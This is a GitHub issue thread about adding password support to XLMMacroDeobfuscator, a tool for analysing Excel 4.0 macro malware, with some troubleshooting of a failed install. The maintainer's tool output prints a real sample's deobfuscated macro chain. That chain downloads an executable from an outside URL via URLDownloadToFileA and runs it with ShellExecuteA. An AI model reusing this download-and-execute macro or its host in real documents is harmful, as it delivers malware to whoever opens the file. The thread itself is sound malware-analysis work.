search

DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0
568 stars 115 forks source link

Support for password protected documents #41

Closed Maijin closed 4 years ago

Maijin commented 4 years ago

Support to provide a password.

Example of sample: https://www.virustotal.com/gui/file/3fbc4f03bd9e52de5042b656f87c11d44128246e657eb65cb2944c490df86948/detection

Password for the macro - "CaseExport"

DissectMalware commented 4 years ago

This is added. Now you can use --passwrord 

          _        _______
|\     /|( \      (       )
( \   / )| (      | () () |
 \ (_) / | |      | || || |
  ) _ (  | |      | |(_)| |
 / ( ) \ | |      | |   | |
( /   \ )| (____/\| )   ( |
|/     \|(_______/|/     \|
   ______   _______  _______  ______   _______           _______  _______  _______ _________ _______  _______
  (  __  \ (  ____ \(  ___  )(  ___ \ (  ____ \|\     /|(  ____ \(  ____ \(  ___  )\__   __/(  ___  )(  ____ )
  | (  \  )| (    \/| (   ) || (   ) )| (    \/| )   ( || (    \/| (    \/| (   ) |   ) (   | (   ) || (    )|
  | |   ) || (__    | |   | || (__/ / | (__    | |   | || (_____ | |      | (___) |   | |   | |   | || (____)|
  | |   | ||  __)   | |   | ||  __ (  |  __)   | |   | |(_____  )| |      |  ___  |   | |   | |   | ||     __)
  | |   ) || (      | |   | || (  \ \ | (      | |   | |      ) || |      | (   ) |   | |   | |   | || (\ (
  | (__/  )| (____/\| (___) || )___) )| )      | (___) |/\____) || (____/\| )   ( |   | |   | (___) || ) \ \__
  (______/ (_______/(_______)|/ \___/ |/       (_______)\_______)(_______/|/     \|   )_(   (_______)|/   \__/

XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: C:\Users\user\Downloads\samples\encrypted\3fbc4f03bd9e52de5042b656f87c11d44128246e657eb65cb2944c490df86948

Encrypted xls file
[Loading Cells]
auto_open: auto_open->SODXOFScMLykMiu!$AJ$1892
[Starting Deobfuscation]
CELL:AJ1892    , FullEvaluation      , RUN(SODXOFScMLykMiu!DE1231)
CELL:DE1231    , FullEvaluation      , RUN(SODXOFScMLykMiu!IB533)
CELL:IB533     , FullEvaluation      , RUN(SODXOFScMLykMiu!BU1660)
CELL:BU1660    , FullEvaluation      , RUN(SODXOFScMLykMiu!HO1531)
CELL:HO1531    , FullEvaluation      , RUN(SODXOFScMLykMiu!FM801)
CELL:FM801     , FullEvaluation      , RUN(SODXOFScMLykMiu!HX103)
CELL:HX103     , FullEvaluation      , RUN(SODXOFScMLykMiu!IL1999)
CELL:IL1999    , FullEvaluation      , RUN(SODXOFScMLykMiu!AV301)
CELL:AV301     , FullEvaluation      , RUN(SODXOFScMLykMiu!DJ983)
CELL:DJ983     , FullEvaluation      , RUN(SODXOFScMLykMiu!GB1499)
CELL:GB1499    , FullEvaluation      , RUN(SODXOFScMLykMiu!HB1146)
CELL:HB1146    , FullEvaluation      , RUN(SODXOFScMLykMiu!GW1150)
CELL:GW1150    , FullEvaluation      , RUN(SODXOFScMLykMiu!IE1976)
CELL:IE1976    , FullEvaluation      , RUN(SODXOFScMLykMiu!GJ1965)
CELL:GJ1965    , FullEvaluation      , RUN(SODXOFScMLykMiu!FD689)
CELL:FD689     , FullEvaluation      , RUN(SODXOFScMLykMiu!IL1604)
CELL:IL1604    , FullEvaluation      , RUN(SODXOFScMLykMiu!GY366)
CELL:GY366     , FullEvaluation      , RUN(SODXOFScMLykMiu!M81)
CELL:M81       , FullEvaluation      , RUN(SODXOFScMLykMiu!E1006)
CELL:E1006     , FullEvaluation      , RUN(SODXOFScMLykMiu!EC1970)
CELL:EC1970    , FullEvaluation      , RUN(SODXOFScMLykMiu!DZ879)
CELL:DZ879     , FullEvaluation      , RUN(SODXOFScMLykMiu!AR268)
CELL:AR268     , FullEvaluation      , RUN(SODXOFScMLykMiu!BZ1448)
CELL:BZ1448    , FullEvaluation      , RUN(SODXOFScMLykMiu!DF1899)
CELL:DF1899    , FullEvaluation      , RUN(SODXOFScMLykMiu!EH1557)
CELL:EH1557    , FullEvaluation      , RUN(SODXOFScMLykMiu!EI1443)
CELL:EI1443    , FullEvaluation      , RUN(SODXOFScMLykMiu!AH924)
CELL:AH924     , FullEvaluation      , RUN(SODXOFScMLykMiu!CK584)
CELL:CK584     , FullEvaluation      , RUN(SODXOFScMLykMiu!FA493)
CELL:FA493     , FullEvaluation      , RUN(SODXOFScMLykMiu!FH97)
CELL:FH97      , FullEvaluation      , RUN(SODXOFScMLykMiu!DN1583)
CELL:DN1583    , FullEvaluation      , RUN(SODXOFScMLykMiu!BW524)
CELL:BW524     , FullEvaluation      , RUN(SODXOFScMLykMiu!GI653)
CELL:GI653     , FullEvaluation      , RUN(SODXOFScMLykMiu!FT1548)
CELL:FT1548    , FullEvaluation      , RUN(SODXOFScMLykMiu!GS680)
CELL:GS680     , FullEvaluation      , RUN(SODXOFScMLykMiu!X1432)
CELL:X1432     , FullEvaluation      , RUN(SODXOFScMLykMiu!HE1355)
CELL:HE1355    , FullEvaluation      , RUN(SODXOFScMLykMiu!FB898)
CELL:FB898     , FullEvaluation      , RUN(SODXOFScMLykMiu!EU12)
CELL:EU12      , FullEvaluation      , RUN(SODXOFScMLykMiu!HR741)
CELL:HR741     , FullEvaluation      , RUN(SODXOFScMLykMiu!FT1961)
CELL:FT1961    , FullEvaluation      , RUN(SODXOFScMLykMiu!DN809)
CELL:DN809     , FullEvaluation      , RUN(SODXOFScMLykMiu!DF1607)
CELL:DF1607    , FullEvaluation      , RUN(SODXOFScMLykMiu!HT374)
CELL:HT374     , FullEvaluation      , RUN(SODXOFScMLykMiu!BE319)
CELL:BE319     , FullEvaluation      , RUN(SODXOFScMLykMiu!FZ1824)
CELL:FZ1824    , FullEvaluation      , RUN(SODXOFScMLykMiu!BS113)
CELL:BS113     , FullEvaluation      , RUN(SODXOFScMLykMiu!K1343)
CELL:K1343     , FullEvaluation      , RUN(SODXOFScMLykMiu!AX1293)
CELL:AX1293    , FullEvaluation      , RUN(SODXOFScMLykMiu!DI1828)
CELL:DI1828    , FullEvaluation      , RUN(SODXOFScMLykMiu!ES1414)
CELL:ES1414    , FullEvaluation      , RUN(SODXOFScMLykMiu!FR1988)
CELL:FR1988    , FullEvaluation      , RUN(SODXOFScMLykMiu!DQ865)
CELL:DQ865     , FullEvaluation      , RUN(SODXOFScMLykMiu!FO177)
CELL:FO177     , FullEvaluation      , RUN(SODXOFScMLykMiu!CU1489)
CELL:CU1489    , FullEvaluation      , RUN(SODXOFScMLykMiu!CI975)
CELL:CI975     , FullEvaluation      , RUN(SODXOFScMLykMiu!EV1486)
CELL:EV1486    , FullEvaluation      , RUN(SODXOFScMLykMiu!EB1379)
CELL:EB1379    , FullEvaluation      , RUN(SODXOFScMLykMiu!GQ1208)
CELL:GQ1208    , FullEvaluation      , RUN(SODXOFScMLykMiu!CM1059)
CELL:CM1059    , FullEvaluation      , RUN(SODXOFScMLykMiu!R1740)
CELL:R1740     , FullEvaluation      , RUN(SODXOFScMLykMiu!AL1898)
CELL:AL1898    , FullEvaluation      , RUN(SODXOFScMLykMiu!FS1510)
CELL:FS1510    , FullEvaluation      , RUN(SODXOFScMLykMiu!BB1041)
CELL:BB1041    , FullEvaluation      , RUN(SODXOFScMLykMiu!BS1618)
CELL:BS1618    , FullEvaluation      , RUN(SODXOFScMLykMiu!GD893)
CELL:GD893     , FullEvaluation      , RUN(SODXOFScMLykMiu!CU813)
CELL:CU813     , FullEvaluation      , RUN(SODXOFScMLykMiu!AY1175)
CELL:AY1175    , FullEvaluation      , RUN(SODXOFScMLykMiu!A1204)
CELL:A1204     , FullEvaluation      , RUN(SODXOFScMLykMiu!IE1256)
CELL:IE1256    , FullEvaluation      , RUN(SODXOFScMLykMiu!GR1403)
CELL:GR1403    , FullEvaluation      , RUN(SODXOFScMLykMiu!U1941)
CELL:U1941     , FullEvaluation      , RUN(SODXOFScMLykMiu!HP286)
CELL:HP286     , FullEvaluation      , RUN(SODXOFScMLykMiu!AV1809)
CELL:AV1809    , FullEvaluation      , RUN(SODXOFScMLykMiu!BX1101)
CELL:BX1101    , FullEvaluation      , RUN(SODXOFScMLykMiu!S1290)
CELL:S1290     , FullEvaluation      , RUN(SODXOFScMLykMiu!HV1162)
CELL:HV1162    , FullEvaluation      , RUN(SODXOFScMLykMiu!FH1567)
CELL:FH1567    , FullEvaluation      , RUN(SODXOFScMLykMiu!FK1978)
CELL:FK1978    , FullEvaluation      , RUN(SODXOFScMLykMiu!HO1505)
CELL:HO1505    , FullEvaluation      , RUN(SODXOFScMLykMiu!BF332)
CELL:BF332     , FullEvaluation      , RUN(SODXOFScMLykMiu!CL1933)
CELL:CL1933    , FullEvaluation      , RUN(SODXOFScMLykMiu!D681)
CELL:D681      , FullEvaluation      , RUN(SODXOFScMLykMiu!HE9)
CELL:HE9       , FullEvaluation      , RUN(SODXOFScMLykMiu!BY578)
CELL:BY578     , FullEvaluation      , RUN(SODXOFScMLykMiu!AP1706)
CELL:AP1706    , FullEvaluation      , RUN(SODXOFScMLykMiu!DD1905)
CELL:DD1905    , FullEvaluation      , RUN(SODXOFScMLykMiu!GQ1278)
CELL:GQ1278    , FullEvaluation      , RUN(SODXOFScMLykMiu!AX1258)
CELL:AX1258    , FullEvaluation      , RUN(SODXOFScMLykMiu!EM865)
CELL:EM865     , FullEvaluation      , RUN(SODXOFScMLykMiu!AK29)
CELL:AK29      , FullEvaluation      , RUN(SODXOFScMLykMiu!IA1434)
CELL:IA1434    , FullEvaluation      , RUN(SODXOFScMLykMiu!BW1536)
CELL:BW1536    , FullEvaluation      , RUN(SODXOFScMLykMiu!DS245)
CELL:DS245     , FullEvaluation      , RUN(SODXOFScMLykMiu!DP380)
CELL:DP380     , FullEvaluation      , RUN(SODXOFScMLykMiu!HV1392)
CELL:HV1392    , FullEvaluation      , RUN(SODXOFScMLykMiu!GM781)
CELL:GM781     , FullEvaluation      , RUN(SODXOFScMLykMiu!EC1752)
CELL:EC1752    , FullEvaluation      , RUN(SODXOFScMLykMiu!AG83)
CELL:AG83      , FullEvaluation      , RUN(SODXOFScMLykMiu!R1190)
CELL:R1190     , FullEvaluation      , RUN(SODXOFScMLykMiu!AK187)
CELL:AK188     , FullEvaluation      , RUN(SODXOFScMLykMiu!BT794)
CELL:BT794     , FullEvaluation      , FORMULA("https://alwaslapps.com/attachment/attach.php",$BB$54)
CELL:BT795     , FullEvaluation      , RUN(SODXOFScMLykMiu!BO869)
CELL:BO870     , FullEvaluation      , RUN(SODXOFScMLykMiu!C441)
CELL:C441      , FullEvaluation      , FORMULA("C:\RzzmZzW\jxfwimM\HDrMCsH.exe",$DA$872)
CELL:C442      , FullEvaluation      , RUN(SODXOFScMLykMiu!GO844)
CELL:GO845     , FullEvaluation      , RUN(SODXOFScMLykMiu!DY1142)
CELL:DY1142    , FullEvaluation      , FORMULA("C:\RzzmZzW\jxfwimM\HDrMCsH.exe",$GO$835)
CELL:DY1143    , FullEvaluation      , RUN(SODXOFScMLykMiu!R1332)
CELL:R1333     , FullEvaluation      , RUN(SODXOFScMLykMiu!G1771)
CELL:G1771     , FullEvaluation      , FORMULA("URLMON",$AA$1470)
CELL:G1772     , FullEvaluation      , RUN(SODXOFScMLykMiu!CL1155)
CELL:CL1156    , FullEvaluation      , RUN(SODXOFScMLykMiu!CX428)
CELL:CX428     , FullEvaluation      , FORMULA("URLDownloadToFileA",$IN$799)
CELL:CX429     , FullEvaluation      , RUN(SODXOFScMLykMiu!O612)
CELL:O613      , FullEvaluation      , RUN(SODXOFScMLykMiu!EM1722)
CELL:EM1722    , FullEvaluation      , FORMULA("JJCCJJ",$GA$737)
CELL:EM1723    , FullEvaluation      , RUN(SODXOFScMLykMiu!F375)
CELL:F376      , FullEvaluation      , RUN(SODXOFScMLykMiu!FQ1809)
CELL:FQ1809    , FullEvaluation      , FORMULA("Shell32",$AJ$179)
CELL:FQ1810    , FullEvaluation      , RUN(SODXOFScMLykMiu!V138)
CELL:V139      , FullEvaluation      , RUN(SODXOFScMLykMiu!AI1582)
CELL:AI1582    , FullEvaluation      , FORMULA("ShellExecuteA",$GZ$149)
CELL:AI1583    , FullEvaluation      , RUN(SODXOFScMLykMiu!HF997)
CELL:HF998     , FullEvaluation      , RUN(SODXOFScMLykMiu!HQ1436)
CELL:HQ1436    , FullEvaluation      , FORMULA("JJCCCCJ",$K$1550)
CELL:HQ1437    , FullEvaluation      , RUN(SODXOFScMLykMiu!AJ403)
CELL:AJ404     , FullEvaluation      , RUN(SODXOFScMLykMiu!GY1132)
CELL:GY1132    , FullEvaluation      , FORMULA("Open",$DO$1091)
CELL:GY1133    , FullEvaluation      , RUN(SODXOFScMLykMiu!HK1081)
CELL:HK1082    , FullEvaluation      , RUN(SODXOFScMLykMiu!EH465)
CELL:EH465     , FullEvaluation      , FORMULA("regsvr32.exe",$AN$1976)
CELL:EH466     , FullEvaluation      , RUN(SODXOFScMLykMiu!HM1937)
CELL:HM1938    , FullEvaluation      , RUN(SODXOFScMLykMiu!CP1990)
CELL:CP1990    , FullEvaluation      , FORMULA("rundll32.exe",$GX$811)
CELL:CP1991    , FullEvaluation      , RUN(SODXOFScMLykMiu!AA643)
CELL:AA644     , FullEvaluation      , RUN(SODXOFScMLykMiu!AO18)
CELL:AO18      , FullEvaluation      , FORMULA("C:\RzzmZzW",$AH$649)
CELL:AO19      , FullEvaluation      , RUN(SODXOFScMLykMiu!B755)
CELL:B756      , FullEvaluation      , RUN(SODXOFScMLykMiu!FP996)
CELL:FP996     , FullEvaluation      , FORMULA("C:\RzzmZzW\jxfwimM",$EW$1522)
CELL:FP997     , FullEvaluation      , RUN(SODXOFScMLykMiu!EU1625)
CELL:EU1626    , FullEvaluation      , RUN(SODXOFScMLykMiu!EY1062)
CELL:EY1062    , FullEvaluation      , FORMULA("Kernel32",$BN$639)
CELL:EY1063    , FullEvaluation      , RUN(SODXOFScMLykMiu!HX479)
CELL:HX480     , FullEvaluation      , RUN(SODXOFScMLykMiu!EI47)
CELL:EI47      , FullEvaluation      , FORMULA("CreateDirectoryA",$IK$949)
CELL:EI48      , FullEvaluation      , RUN(SODXOFScMLykMiu!GS1958)
CELL:GS1959    , FullEvaluation      , RUN(SODXOFScMLykMiu!FV712)
CELL:FV712     , FullEvaluation      , FORMULA("JCJ",$IH$1515)
CELL:FV713     , FullEvaluation      , RUN(SODXOFScMLykMiu!R1191)
CELL:R1191     , FullEvaluation      , CALL("Kernel32","CreateDirectoryA","JCJ","C:\RzzmZzW",0)
CELL:R1192     , FullEvaluation      , CALL("Kernel32","CreateDirectoryA","JCJ","C:\RzzmZzW\jxfwimM",0)
CELL:R1194     , FullEvaluation      , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://alwaslapps.com/attachment/attach.php","C:\RzzmZzW\jxfwimM\HDrMCsH.exe",0,0)
CELL:R1195     , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\RzzmZzW\jxfwimM\HDrMCsH.exe",,0,0)
CELL:R1198     , End                 , HALT()
[END of Deobfuscation]
time elapsed: 1.9595320224761963
Maijin commented 4 years ago

Just tried on latest git version and the program is aborting:

xlmdeobfuscator -p CaseExport -f 3fbc4f03bd9e52de5042b656f87c11d44128246e657eb65cb2944c490df86948
pywin32 is not installed (only is required if you want to use MS Excel)

          _        _______
|\     /|( \      (       )
( \   / )| (      | () () |
 \ (_) / | |      | || || |
  ) _ (  | |      | |(_)| |
 / ( ) \ | |      | |   | |
( /   \ )| (____/\| )   ( |
|/     \|(_______/|/     \|
   ______   _______  _______  ______   _______           _______  _______  _______ _________ _______  _______
  (  __  \ (  ____ \(  ___  )(  ___ \ (  ____ \|\     /|(  ____ \(  ____ \(  ___  )\__   __/(  ___  )(  ____ )
  | (  \  )| (    \/| (   ) || (   ) )| (    \/| )   ( || (    \/| (    \/| (   ) |   ) (   | (   ) || (    )|
  | |   ) || (__    | |   | || (__/ / | (__    | |   | || (_____ | |      | (___) |   | |   | |   | || (____)|
  | |   | ||  __)   | |   | ||  __ (  |  __)   | |   | |(_____  )| |      |  ___  |   | |   | |   | ||     __)
  | |   ) || (      | |   | || (  \ \ | (      | |   | |      ) || |      | (   ) |   | |   | |   | || (\ (
  | (__/  )| (____/\| (___) || )___) )| )      | (___) |/\____) || (____/\| )   ( |   | |   | (___) || ) \ \__
  (______/ (_______/(_______)|/ \___/ |/       (_______)\_______)(_______/|/     \|   )_(   (_______)|/   \__/

XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: /Users/maijin/Projects/Reverse/#_SAMPLES/3fbc4f03bd9e52de5042b656f87c11d44128246e657eb65cb2944c490df86948

[1]    7162 abort      xlmdeobfuscator -p CaseExport -f

Same with quotes or without the -p parameter.

DissectMalware commented 4 years ago

Seems to be a failure in msoffcrypt as xlmdeobfuscator does not show this message. On my system I can decrypt this file successfully and cannot reproduce your output. Can you try to update once again? pip install -U XLMMacroDeobfuscator --force

Can you also tell me the setting you are using to run this command?

DissectMalware commented 4 years ago

I tested on Mac, and it seems it is working

image

Please in addition to specifying the system you are testing on, provide the full command.

Maijin commented 4 years ago

Ok looks like again, the pip3 install/uninstall doesn't clean properly the dependancies, I have reinstalled all of them and now it works.

DissectMalware commented 4 years ago

Please share how you addressed the issue.. Didn't --force help?

I want to update README to prevent similar issues that's why I am asking.